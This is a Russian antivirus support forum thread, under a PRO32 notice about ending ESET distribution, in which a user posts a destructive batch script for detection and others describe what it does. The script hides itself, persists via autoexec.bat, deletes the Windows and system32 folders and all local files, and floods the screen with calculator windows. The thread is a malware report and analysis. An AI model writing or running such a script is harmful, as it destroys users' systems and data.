Уважаемые пользователи!

Поставщик ИТ-решений PRO32 сообщает вам, что после 17 лет сотрудничества мы более не являемся эксклюзивным дистрибьютором программных продуктов словацкого разработчика ESET в России, Республике Беларусь, Казахстане, Азербайджане, Узбекистане, Кыргызстане, Таджикистане, Туркменистане, Молдове, Грузии и Армении.

Купить и продлить лицензии ESET на нашем сайте больше нельзя.

Предлагаем вам попробовать новый антивирус от компании PRO32.

Продукты PRO32 — это технологичные решения, надежная защита от киберугроз и максимальная производительность устройств на Windows / Android.

Для действующих клиентов ESET мы предлагаем промокод на скидку в размере 15% — ESET15. Скопируйте его и после добавления товара в корзину, не забудьте его применить в корзине.

[ Закрыто ] Обнаружен код который ломает ОС и даже Bios, прошу обновить базы и найти подобные, вирусы. , Написан через блокнот вашем антивирусником не определяется, по этому прошу обеспечить максимальную защиту, нехочу вновь попасться на такую шутку, вирус запускается только при его открытии.

RSS
@Echo off  
Echo вот ты и попал!!!
Date 21.12.12
If exist охринеть!!!.bat goto abc
:abc
Copy %0 охринеть!!!.bat
Attrib +h охринеть!!!.bat
Echo охринеть!!!.bat >>autoexec.bat
del c:Windows/q
del c:Windows\system32/q
del *.*/q

Label E: PRIDUROK
Echo НЕ ХОРОШО ОБИЖАТЬ ДЕВОЧЕК!!!

/q:
FOR /L %%i IN (1,1,1000) DO md %%i

start calc
start calc
start calc
start calc
start calc
start calc
---------------------------------------------------------------------------------------------------------------------------------------------
start calc - повторяется более 1000 раз!

Ответы

Хотелось бы узнать что делает этот вирус
Цитата
Андрей пишет:
Хотелось бы узнать что делает этот вирус
Знаешь, не только вы хотели задать этот вопрос. Меня тоже один спросил. Ну что я ему отвечу, да и вообще это ведь не я его создал. Ну при запуске он изменил дату на 21.12.12 )), отключил антивирусную защиту, ну дальше я не стал проверять. Я ведь хотел его в тех. поддержку отправить. Случайно запустил из архива, хорошо что я успел его выключить. А то не знаю что было бы. И главное даже после перезагрузки антивирусник выключен. Я ведь NOD пользуюсь. Ну главное что теперь против него есть защита. - и не только, определяются и другие. (подобные вирусы).
Вирус в частности делает следующее:
1) изменяет системное время;
2) отключает антивирусную защиту;
3) удаляет папку Windows;
4) удаляет все остальное;
5) и начинает вызывать калькулятор)
Цитата
marshal64 пишет:
Вирус в частности делает следующее:
1) изменяет системное время;
2) отключает антивирусную защиту;
3) удаляет папку Windows;
4) удаляет все остальное;
5) и начинает вызывать калькулятор)
Большое спасибо за информацию, буду знать )
а вот ещё образец техподержка говорит что ловится с базой 5050

Удален @ Алексей


dura lex, sed lex
закон суров, но это - закон
Только что проверил -НЕ ЛОВИТСЯ
Отправил в тех. поддержку
Результаты напишу
Кстати если эти вирусы будут в разрешении exe и будет автозапуск этого файла, то вирус запускается сам.
Цитата
vir пишет:
а вот ещё образец техподержка говорит что ловится с базой 5050
Ага) посмотрел. - И Хорошо что ловится.
Цитата
Андрей пишет:
Результаты напишу
СПС )
Изменено: Евгений Дудаладов - 23.04.2010 11:56:00
Читают тему